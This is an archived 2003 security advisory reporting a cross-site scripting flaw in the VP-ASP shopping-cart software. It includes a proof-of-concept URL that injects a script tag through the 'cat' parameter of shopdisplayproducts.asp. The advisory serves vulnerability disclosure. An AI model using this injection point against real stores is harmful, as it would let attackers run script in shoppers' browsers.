OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Cross Site Scripting in VP-ASP

From: Xnuxer Research Laboratory (xnuxerlinux.net)
Date: Fri Dec 05 2003 - 06:19:28 CST


   Advisory Name: Cross Site Scripting in VP-ASP
    Release Date: December 05st, 2003
     Application: VP-ASP
Version Affected: < 4.50
        Platform: ASP
        Severity: Low
        Discover: Xnuxer Research Lab. (xnuxerlinux.net, xnuxeryahoo.com)
      Vendor URL: http://www.vp-asp.com
       Reference: http://infosekuriti.com

Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]

Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>

_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/